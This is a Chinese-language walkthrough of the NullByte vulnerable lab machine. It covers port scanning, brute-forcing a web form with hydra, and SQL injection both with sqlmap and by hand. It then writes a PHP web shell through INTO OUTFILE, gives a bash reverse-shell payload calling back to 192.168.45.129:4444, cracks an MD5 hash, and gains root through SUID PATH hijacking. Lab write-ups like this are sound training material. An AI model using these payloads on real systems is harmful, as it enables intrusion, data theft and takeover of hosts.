信息收集
先进行目标主机的端口扫描
┌──(root㉿LAPTOP-AVRKN16D)-[~] └─# nmap --min-rate 10000 -p- -oA nullbyteports 10.192.95.89 Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-24 19:00 CST Nmap scan report for 10.192.95.89 Host is up (0.016s latency). Not shown: 65531 closed tcp ports (reset) PORT STATE SERVICE 80/tcp open http 111/tcp open rpcbind 777/tcp open multiling-http 38590/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 15.16 seconds
获得到端口信息后,再针对开放端口信息进行TCP扫描
┌──(root㉿LAPTOP-AVRKN16D)-[~] └─# nmap -sT -sC -sV -O -p80,111,777,38590 -oA nullbytetcp 10.192.95.89 Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-24 19:05 CST NSOCK ERROR [17.2990s] mksock_bind_addr(): Bind to 0.0.0.0:999 failed (IOD #38): Address already in use (98) NSOCK ERROR [17.3220s] mksock_bind_addr(): Bind to 0.0.0.0:954 failed (IOD #40): Address already in use (98) Nmap scan report for 10.192.95.89 Host is up (0.00091s latency). PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.10 ((Debian)) |_http-title: Null Byte 00 - level 1 |_http-server-header: Apache/2.4.10 (Debian) 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind | 100000 3,4 111/udp6 rpcbind | 100024 1 38590/tcp status | 100024 1 49204/tcp6 status | 100024 1 54856/udp6 status |_ 100024 1 56022/udp status 777/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0) | ssh-hostkey: | 1024 16:30:13:d9:d5:55:36:e8:1b:b7:d9:ba:55:2f:d7:44 (DSA) | 2048 29:aa:7d:2e:60:8b:a6:a1:c2:bd:7c:c8:bd:3c:f4:f2 (RSA) | 256 60:06:e3:64:8f:8a:6f:a7:74:5a:8b:3f:e1:24:93:96 (ECDSA) |_ 256 bc:f7:44:8d:79:6a:19:48:76:a3:e2:44:92:dc:13:a2 (ED25519) 38590/tcp open status 1 (RPC #100024) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 3.2 - 4.9 (97%), Linux 3.10 - 4.11 (94%), OpenWrt Chaos Calmer 15.05 (Linux 3.18) or Designated Driver (Linux 4.1 or 4.4) (94%), Sony Android TV (Android 5.0) (93%), Android 5.1 (93%), Linux 3.2 - 3.16 (93%), Android 4.0 (93%), Linux 3.12 (93%), Linux 3.13 (93%), Linux 3.8 - 3.11 (93%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 17.40 seconds
对目标端口进行udp扫描
┌──(root㉿LAPTOP-AVRKN16D)-[~] └─# nmap -sU -p80,111,777,38590 -oA nullbyteudp 10.192.95.89 Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-24 19:07 CST Nmap scan report for 10.192.95.89 Host is up (0.0012s latency). PORT STATE SERVICE 80/udp closed http 111/udp open rpcbind 777/udp closed multiling-http 38590/udp closed unknown Nmap done: 1 IP address (1 host up) scanned in 1.40 seconds
80端口探查
查看网站的源码,下载该图片的
在对图片进行进一步的操作之前,先进行该网站的目录爆破,在这里我们使用gobuster
┌──(root㉿kali)-[~/Desktop] └─# gobuster dir -u http://10.192.95.89 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt =============================================================== Gobuster v3.5 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.192.95.89 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.5 [+] Timeout: 10s =============================================================== 2023/04/24 07:12:41 Starting gobuster in directory enumeration mode =============================================================== /uploads (Status: 301) [Size: 314] [--> http://10.192.95.89/uploads/] /javascript (Status: 301) [Size: 317] [--> http://10.192.95.89/javascript/] /phpmyadmin (Status: 301) [Size: 317] [--> http://10.192.95.89/phpmyadmin/] /server-status (Status: 403) [Size: 300] Progress: 220331 / 220561 (99.90%) =============================================================== 2023/04/24 07:16:17 Finished
使用exiftool工具对该图片的元数据进行查看
┌──(root㉿kali)-[~/Desktop] └─# exiftool main.gif ExifTool Version Number : 12.57 File Name : main.gif Directory : . File Size : 17 kB File Modification Date/Time : 2015:08:01 12:39:30-04:00 File Access Date/Time : 2023:04:24 07:10:23-04:00 File Inode Change Date/Time : 2023:04:24 07:10:23-04:00 File Permissions : -rw-r--r-- File Type : GIF File Type Extension : gif MIME Type : image/gif GIF Version : 89a Image Width : 235 Image Height : 302 Has Color Map : No Color Resolution Depth : 8 Bits Per Pixel : 1 Background Color : 0 Comment : P-): kzMb5nVYJw Image Size : 235x302 Megapixels : 0.071
发现在comment属性中,写入了一串字符串。
通过对gobuster中爆破出的数据的探查,并没有看到什么有效的信息,在进行了若干尝试之后,我们把comment属性中的字符串输入到网站的url中,发现有回应
通过查看该网站的源代码,下面的注释中提示着,该密码是一个弱密码,在往下的尝试中,可以使用hydra来进行暴力破解
┌──(root㉿LAPTOP-AVRKN16D)-[~] └─# hydra 10.192.95.89 http-form-post "/kzMb5nVYJw/index.php:key=^PASS^:invalid key" -l hzh -P /usr/share/wordlists/rockyou.txt Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-24 19:35:53 [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task [DATA] attacking http-post-form://10.192.95.89:80/kzMb5nVYJw/index.php:key=^PASS^:invalid key [STATUS] 4159.00 tries/min, 4159 tries in 00:01h, 14340240 to do in 57:29h, 16 active [STATUS] 4385.67 tries/min, 13157 tries in 00:03h, 14331242 to do in 54:28h, 16 active [80][http-post-form] host: 10.192.95.89 login: hzh password: elite 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-04-24 19:41:31
输入密码后,又是一个表单
在表单中,输入“后,返回了sql语法错误的界面,因此可以合理推断该地方存在sql注入的点
SQL注入
方法一:sqlmap注入
┌──(root㉿kali)-[~/Desktop] └─# sqlmap -u "http://10.192.95.89/kzMb5nVYJw/420search.php?usrtosearch=hzh" -dbms mysql -dbs --batch available databases [5]: [*] information_schema [*] mysql [*] performance_schema [*] phpmyadmin [*] seth
可以看到存在一个叫做seth的库,我们接着对这个库进行探查
┌──(root㉿kali)-[~/Desktop] └─# sqlmap -u "http://10.192.95.89/kzMb5nVYJw/420search.php?usrtosearch=hzh" -dbms mysql -D seth --tables --batch Database: seth [1 table] +-------+ | users | +-------+
存在一个叫做users的表,接着对这个表进行探查
┌──(root㉿kali)-[~/Desktop] └─# sqlmap -u "http://10.192.95.89/kzMb5nVYJw/420search.php?usrtosearch=hzh" -dbms mysql -D seth -T users -columns --batch [4 columns] +----------+-------------+ | Column | Type | +----------+-------------+ | position | text | | user | text | | id | smallint(6) | | pass | text | +----------+-------------+
对数据进行转储,查看user表中存在什么信息
┌──(root㉿kali)-[~/Desktop] └─# sqlmap -u "http://10.192.95.89/kzMb5nVYJw/420search.php?usrtosearch=hzh" -dbms mysql -D seth -T users --dump --batch [2 entries] +----+---------------------------------------------+--------+------------+ | id | pass | user | position | +----+---------------------------------------------+--------+------------+ | 1 | YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE | ramses | <blank> | | 2 | --not allowed-- | isis | employee | +----+---------------------------------------------+--------+------------+
方式二:手工注入
首先探查该返回多少列,可以通过联合查询union来进行查看,或者order by来进行查看
"uninon select 1,2,3;-- - "order by 3;-- -
当select或者order by测试到第四个元素的时候,返回报错,因此可以推测总共有三列返回。
接着使用下面这个代码对当前数据库的情况做一个探测
"union select database(),@@version,user();-- -
可以知道当前的数据库为seth,并且用户是root用户
接着去读取seth这个数据中的信息,首先需要探查seth这个数据库中的字段
"union select table_schema,table_name,3 from information_schema.tables;-- - "union select tables_name,2,3 from information_schema.tables where table_schema="seth";-- -
可以看到seth这个数据库中,有一个users表,现在对seth中的users表中的数据进行探查
"union select column_name,2,3 from information_schema.columns where table_schema="seth" and table_name="users";-- -
可以看到有id,user,pass和position这几个字段,现在只需要将这些字段读取出来
通过上面的返回信息已经可以知道,返回的是seth表中的数据,因此在这里可以直接执行
"union select id,user,pass from users;-- -
成功读取了数据。
方法三:写入命令执行文件
" union select "<?php system($_GET['hzh']);?>","","" into outfile "/var/www/html/uploads/hzh.php";-- -
注入成功后,刚刚在目录爆破时,我们可以知道有一个uploads的文件夹,现在访问该文件夹下的hzh.php文件。
┌──(root㉿kali)-[~/Desktop] └─# curl http://10.192.95.89/uploads/hzh.php?hzh=cat%20/etc/passwd 1 ramses 2 isis employee root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
成功使用
通过对注入点的源代码进行查看,可以看到get方法是通过420search.php这个文件与数据库进行交互的,因此,现在我们来看看420search.php这个文件中都包含有什么信息。
┌──(root㉿kali)-[~/Desktop] └─# curl http://10.192.95.89/uploads/hzh.php?hzh=cat%20/var/www/html/kzMb5nVYJw/420search.php 1 ramses 2 isis employee <?php $word = $_GET["usrtosearch"]; $dbhost = 'localhost:3036'; $dbuser = 'root'; $dbpass = 'sunnyvale'; $conn = mysql_connect($dbhost, $dbuser, $dbpass); if(! $conn ) { die('Could not connect: ' . mysql_error()); } $sql = 'SELECT id, user, position FROM users WHERE user LIKE "%'.$word.'%" '; mysql_select_db('seth'); $retval = mysql_query( $sql, $conn ); if(! $retval ) { die('Could not get data: ' . mysql_error()); } while($row = mysql_fetch_array($retval, MYSQL_ASSOC)) { echo "EMP ID :{$row['id']} <br> ". "EMP NAME : {$row['user']} <br> ". "EMP POSITION : {$row['position']} <br> ". "--------------------------------<br>"; } echo "Fetched data successfully\n"; mysql_close($conn);
可以看到用户的账户和密码,在这里可以通过登录phpmyadmin这个数据库管理界面来直接查看数据
方法四:写入反弹shelintol
" union select "<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.129/4444 0>&1'\");?>","","" into outfile "/var/www/html/uploads/nan.php";-- -
哈希破解
得到的
YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE很明显感觉出是base64编码后的,先进性base64的解码,然后得到另一个字符串,看起来是被哈希加密后的,进行哈希加密算法判别,然后再使用John进行暴力破解┌──(root㉿kali)-[~/Desktop] └─# echo -n "YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE" | base64 -d c6d6bd7ebf806f43c76acc3681703b81 base64: invalid input ┌──(root㉿kali)-[~/Desktop] └─# hash-identifier ######################################################################### # __ __ __ ______ _____ # # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 # # By Zion3R # # www.Blackploit.com # # Root@Blackploit.com # ######################################################################### -------------------------------------------------- HASH: c6d6bd7ebf806f43c76acc3681703b81 Possible Hashs: [+] MD5 [+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username))) ┌──(root㉿kali)-[~/Desktop] └─# echo "c6d6bd7ebf806f43c76acc3681703b81" > hzh.txt ┌──(root㉿kali)-[~/Desktop] └─# john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hzh.txt Using default input encoding: UTF-8 Loaded 1 password hash (Raw-MD5 [MD5 32/32]) Warning: no OpenMP support for this hash type, consider --fork=4 Press 'q' or Ctrl-C to abort, almost any other key for status omega (?) 1g 0:00:00:00 DONE (2023-04-24 08:48) 50.00g/s 576000p/s 576000c/s 576000C/s merda..snuffy Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably Session completed.
现在知道密码为omega,账户为ramses
现在通过ssh连接到对方主机上
ssh ramses@10.192.95.89 -p 777
权限提升
首先通过查看sudo -l,查看下是否有特权操作
ramses@NullByte:~$ sudo -l [sudo] password for ramses: Sorry, user ramses may not run sudo on NullByte.
发现并没有,这时候想到通过SUID文件来进行提权,首先先在电脑全局内进行搜索
ramses@NullByte:~$ find / -perm -u=s -type f 2>/dev/null /usr/lib/openssh/ssh-keysign /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/eject/dmcrypt-get-device /usr/lib/pt_chown /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/bin/procmail /usr/bin/at /usr/bin/chfn /usr/bin/newgrp /usr/bin/chsh /usr/bin/gpasswd /usr/bin/pkexec /usr/bin/passwd /usr/bin/sudo /usr/sbin/exim4 /var/www/backup/procwatch /bin/su /bin/mount /bin/umount /sbin/mount.nfs ramses@NullByte:~$
查看/var/www/backup目录下的那个文件
ramses@NullByte:/var/www/backup$ ls -al total 20 drwxrwxrwx 2 root root 4096 Apr 25 04:57 . drwxr-xr-x 4 root root 4096 Aug 2 2015 .. -rwsr-xr-x 1 root root 4932 Aug 2 2015 procwatch lrwxrwxrwx 1 ramses ramses 7 Apr 25 04:57 ps -> /bin/sh -rw-r--r-- 1 root root 28 Aug 2 2015 readme.txt ramses@NullByte:/var/www/backup$ ./procwatch PID TTY TIME CMD 1945 pts/1 00:00:00 procwatch 1946 pts/1 00:00:00 sh 1947 pts/1 00:00:00 ps ramses@NullByte:/var/www/backup$
执行后,发现其调用执行了sh和ps,在这里我们可以调用sh或者是ps这两个中的任意一个来进行提权操作。
在这里我们选择了ps,选择软连接的方式,让/bin/sh链接到sh上,然后修改环境变量,从当前目录下开始执行
ramses@NullByte:/var/www/backup$ ln -s /bin/sh ps ramses@NullByte:/var/www/backup$ ls -al total 20 drwxrwxrwx 2 root root 4096 Apr 25 04:57 . drwxr-xr-x 4 root root 4096 Aug 2 2015 .. -rwsr-xr-x 1 root root 4932 Aug 2 2015 procwatch lrwxrwxrwx 1 ramses ramses 7 Apr 25 04:57 ps -> /bin/sh -rw-r--r-- 1 root root 28 Aug 2 2015 readme.txt ramses@NullByte:/var/www/backup$ export PATH=.:$PATH ramses@NullByte:/var/www/backup$ ./procwatch PID TTY TIME CMD 1945 pts/1 00:00:00 procwatch 1946 pts/1 00:00:00 sh 1947 pts/1 00:00:00 ps ramses@NullByte:/var/www/backup$ ln -s /bin/sh ps ln: failed to create symbolic link ‘ps’: File exists ramses@NullByte:/var/www/backup$ export PATH=.:$PATH ramses@NullByte:/var/www/backup$ ./procwatch # whoami root #N